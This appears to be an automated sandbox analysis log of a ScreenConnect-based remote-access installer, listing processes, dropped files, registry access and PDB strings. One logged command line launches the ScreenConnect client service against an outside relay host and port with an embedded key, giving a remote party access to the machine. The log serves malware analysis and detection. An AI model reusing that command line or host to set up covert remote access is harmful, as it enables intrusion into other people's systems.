                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1304
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engine Classification label: mal51.evad.winEXE@9/70@2/2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe Code function: 0_2_00761000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00761000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Deployment
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7040
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Mutant created: NULL
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6820
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe Command line argument: dfshim 0_2_00761000
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe Virustotal: Detection: 17%
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe ReversingLabs: Detection: 26%
                  Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=variols.ephelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQBN%2fsDy6XX2LDmcpyEoKK55JwThlRr7YHNGe39snOuHFtnjCyK72cZJH78V0V1YAf3iHC4VrBqpgJlkVuiU31AA%2fvSAfza7nhZjCa5ykV2NAakmwwsZZcF4P1vkpVkI7ANPAC%2bVyPuI2q4BXqVaSlq5q6E2QfxXeftcqNGKOU7f6LwNITHSyFLXqkb6omGbacpFoHOXIhxtO51vc7VoYDnePo%2bPLojTyIgk0TnsKSl3v5MmaDGdZnaRO%2fgpfn0w%2fd8d4r7vK%2b35r8AOTYEvrTtJo%2bk50eZpwyQ3Wb4JzVjk4643SyQu2kEB3raxmEp6Lu%2bCnvj%2fq6inamW4uCChS0u0&r=&i=" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1304
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6820 -s 860
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: certificate valid
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe
                  Source: Binary string: (}C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb@ `5M source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.00000000007FC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @(o.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdbJ source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\ScreenConnect.ClientService.pdbpdbice.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: ScreenConnect.Windows.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb8 source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: %%.pdbnt( source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: \ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: ScreenConnect.ClientService.pdb8 source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: ScreenConnect.Core.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2709412544.000002728079C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280238000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280610000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496697785.0000000000D20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496898405.000000000288E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000005.00000002.1444630870.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000005.00000000.1105925658.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2709412544.0000027280088000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496639128.0000000000CD2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: o0C:\Windows\mscorlib.pdb[!x source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb;?*b source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.pdbl source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: ?(oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.ClientService.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Xml.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: oXC:\Windows\ScreenConnect.ClientService.pdbx source: ScreenConnect.ClientService.exe, 00000005.00000002.1443855463.0000000000558000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2709412544.00000272807CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280522000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280234000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728060C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000005.00000002.1445175509.0000000004B22000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.000000000075E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2709412544.0000027280614000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.00000272806D5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728023C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000005.00000002.1445573934.0000000005112000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbd8m source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.2709412544.0000027280088000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496639128.0000000000CD2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: System.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERE665.tmp.dmp.8.dr
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.Core.dll.1.drStatic PE information: 0xA383EAF1 [Wed Dec 6 12:32:49 2056 UTC]
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00761000
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: real checksum: 0x14df5 should be: 0x175cb
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761BC0 push ecx; ret 0_2_00761BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF93699D2A5 pushad ; iretd 1_2_00007FF93699D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AB845E push eax; ret 1_2_00007FF936AB846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AB842E pushad ; ret 1_2_00007FF936AB845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AB7D00 push eax; retf 1_2_00007FF936AB7D1D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AC8071 pushad ; retf 4_2_00007FF936AC809D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AB30B2 pushad ; iretd 4_2_00007FF936AB30B3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AB2E40 pushad ; ret 4_2_00007FF936AB2E73
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AC845E push eax; ret 4_2_00007FF936AC846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AC8430 pushad ; ret 4_2_00007FF936AC845D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936D9E725 pushad ; iretd 4_2_00007FF936D9E7B9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936D97C5E push eax; retf 4_2_00007FF936D97C6D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936D97C2E pushad ; retf 4_2_00007FF936D97C5D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to dropped file
